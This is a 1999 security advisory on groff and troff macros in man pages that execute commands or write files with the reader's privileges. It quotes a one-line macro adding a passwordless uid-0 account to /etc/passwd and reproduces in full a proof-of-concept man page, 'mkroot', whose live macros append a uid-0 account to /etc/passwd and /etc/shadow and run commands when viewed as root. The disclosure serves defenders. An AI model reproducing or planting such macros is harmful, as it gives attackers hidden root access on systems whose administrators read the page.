source: https://www.securityfocus.com/bid/540/info
Versions of GNU groff prior to release 1.11a and standard troff contain vulnerabilities that can possibly lead to a local root compromise if the conditions are right and circumstances are somehow met. A malicious user can, in theory, embed t/g|roff macros inside of man pages that will execute with the uid of the unknowing reader.
A groff example of this is a manpage that, once read as root, will add another user to /etc/passwd with uid0 and no password. The macro for this looks like this:
.opena stream /etc/passwd .write stream r00t::0:0::/:/bin/sh
There are groff other macros that pose a threat if somehow put in a man page that root would view:
To execute a command and display the output:
.pso ls -l /root
While troff has fixed some of these, or at least disabled them by default, old vulnerabilities still exist (such as..):
.sy and .pi
which respectively execute commands a la system() and pipe output to a program.
These problems have quietly existed and been known about for years and it is questionable whether this is even a true vulnerability or not. When permissions are set properly, exploiting this should _not_ be possible, which makes this problem nothing more than an obscure backdoor at best.
.\" Copyright (c) 1999 Pawe³ Wilk <siewca@dione.ids.pl>
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\"
.\" The GNU General Public License's references to "object code"
.\" and "executables" are to be interpreted as the output of any
.\" document formatting or typesetting system, including
.\" intermediate and printed output.
.\"
.\" This manual is distributed in the hope that it will be useful,
.\" but WITHOUT ANY WARRANTY; without even the implied warranty of
.\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
.\" GNU General Public License for more details.
.\"
.\" You should have received a copy of the GNU General Public
.\" License along with this manual; if not, write to the Free
.\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139,
.\" USA.
.\"
.TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual"
.SH NAME
mkroot \- make a root-shell
.SH SYNOPSIS
.BI "man mkroot"
.SH DISCLAIMER
This manual page contains some \fBtroff\fP macros which could break your system's
security. If you are looking at this page being logged as root then you should know
that right in this moment you have allready created new, privileged account
called "sower". The account is disabled by default because of security reasons.
Don't forget to remove it! ;->
This is for information only.... use it at your own risk.
.SH DESCRIPTION
Manual pages are usualy based on \fBtroff\fP (see
.BR troff (1)
) macros. The point is, that some of these macros can access files or
even invoke some shell commands. It's usable, but try to imaginate
that the \fBtroff\fP macros contained in manual pages may have root privileges
if the \fBtroff\fP command's caller is root. (!)
.br
.LP
The most dangerous macros are:
.TP
.BI ".pso" " command"
used to display output of some \fIcommand\fP
.TP
.BI ".write" " stream string"
used to put the \fIstring\fP into the given \fIstream\fP
.LP
.SH EXAMPLES
.BI "/root directory listing" " .pso ls -l /root"
.nf
.pso ls -l /root
.fi
.BI "creating new user called sower (passwd)" " "
.nf
.opena stream /etc/passwd
.write stream sower:*:0:0::/:/dev/null
.fi
.opena stream /etc/passwd
.write stream sower:!:0:0::/:/dev/null
.BI "little preview" " .pso tail /etc/passwd"
.nf
.pso tail /etc/passwd
.fi
.BI "playing with shadow" ""
.nf
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.fi
.opena stream /etc/shadow
.write stream sower:*:10531:0:99999:7::10794:
.BI "fingering new user" " .pso finger sower"
.nf
.pso finger sower
.fi
.SH FILES
.I /etc/passwd
.I /etc/shadow
.SH SEE ALSO
.BR man (1),
.BR passwd (1),
.BR troff (1).
.SH AUTHOR
Pawel Wilk <siewca@dione.ids.pl>
